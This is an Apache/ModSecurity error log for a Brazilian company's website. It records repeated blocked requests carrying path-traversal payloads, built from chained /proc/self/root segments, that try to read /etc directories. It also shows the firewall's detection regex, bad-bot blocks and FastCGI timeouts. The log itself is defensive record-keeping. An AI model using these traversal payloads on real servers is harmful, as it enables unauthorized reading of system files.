[Wed Mar 18 00:33:46.881806 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.241.31:53040] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodGuyqAr6etmhZHNpi-gAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:33:54.129897 2026] [proxy_fcgi:error] [pid 11816:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:37834] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:33:54.186241 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.241.31:41198] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodIvu8EFLIOrSqIpu1YQAAAlc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:34:16.164639 2026] [proxy_fcgi:error] [pid 31803:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:38134] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:34:16.995682 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.241.31:41206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodOOoXxyEfFpUF8f8ZbgAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:34:38.123207 2026] [proxy_fcgi:error] [pid 30077:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:38518] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:34:43.265900 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:44532] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodU-oXxyEfFpUF8f8ZfQAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:34:45.609147 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.241.31:33578] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodVUzinOy1jxa1j4e-FQAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:34:58.422639 2026] [:error] [pid 31803:tid 140411624429312] [client 74.7.244.43:56520] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abodYuyqAr6etmhZHNpjEgAAAE4"]
[Wed Mar 18 00:35:00.129818 2026] [proxy_fcgi:error] [pid 29882:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:38934] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:35:11.115823 2026] [:error] [pid 15826:tid 140411607643904] [client 74.7.228.61:42812] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abodb-oXxyEfFpUF8f8ZgwAAAVA"]
[Wed Mar 18 00:35:22.105806 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:39246] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:35:44.105851 2026] [proxy_fcgi:error] [pid 19507:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:39548] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:36:00.394541 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:59932] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodngkwaGbbGflqUZDAhQAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:36:05.131496 2026] [proxy_fcgi:error] [pid 19507:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:39892] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:36:17.845785 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:44750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abodsdY0UrI5A3LftIw74QAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:36:27.037833 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:40276] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:36:48.109886 2026] [proxy_fcgi:error] [pid 15826:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40568] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:37:09.128053 2026] [proxy_fcgi:error] [pid 19507:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:40794] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:37:31.121797 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:41018] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:37:38.829801 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.241.31:57812] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboeAgkwaGbbGflqUZDAwQAAAM8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:37:52.121644 2026] [proxy_fcgi:error] [pid 30077:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:41336] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:37:55.330708 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.243.128:38754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboeE-w_le52K8_3pV2MywAAAgY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 00:38:05.538530 2026] [:error] [pid 30077:tid 140411691570944] [client 74.7.243.128:32852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboeHfu8EFLIOrSqIpu1mwAAAkY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:38:09.326627 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.243.128:52356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboeISmAPhZkrhU8w4kcsQAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:38:14.129826 2026] [proxy_fcgi:error] [pid 17653:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41692] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:38:19.506536 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:42142] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboeK-oXxyEfFpUF8f8ZwwAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:38:35.045849 2026] [proxy_fcgi:error] [pid 15051:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:42014] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:38:56.125798 2026] [proxy_fcgi:error] [pid 15051:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:42278] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:39:11.271165 2026] [:error] [pid 15051:tid 140411741927168] [client 74.7.241.31:56272] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboeXymAPhZkrhU8w4kc2AAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:39:17.057884 2026] [proxy_fcgi:error] [pid 31803:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:42558] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:39:18.132458 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.243.128:43894] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboeZuw_le52K8_3pV2NBQAAAhg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:39:38.126084 2026] [proxy_fcgi:error] [pid 15051:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42886] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:39:47.718421 2026] [:error] [pid 26799:tid 140411557287680] [client 74.7.241.31:35178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboeg9a6ubjKNq_cu4ZCcAAAA1Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:39:59.129802 2026] [proxy_fcgi:error] [pid 17887:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43278] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:40:00.063748 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.244.43:59008] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboekOyqAr6etmhZHNpjZAAAAFI"]
[Wed Mar 18 00:40:13.915488 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.228.61:55132] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "aboencdf6f5d65gmYZR8-wAAAsI"]
[Wed Mar 18 00:40:20.129777 2026] [proxy_fcgi:error] [pid 31803:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:43598] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:40:43.122052 2026] [proxy_fcgi:error] [pid 15826:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:43932] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:40:43.187738 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.241.31:44142] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboeu-oXxyEfFpUF8f8aCwAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:40:57.340392 2026] [:error] [pid 17887:tid 140411666392832] [client 74.7.241.31:38318] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboeyQkwaGbbGflqUZDBCgAAAMk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:41:05.140185 2026] [proxy_fcgi:error] [pid 11816:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:44280] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:41:28.131886 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:44594] AH01075: Error dispatching request to : (polling)
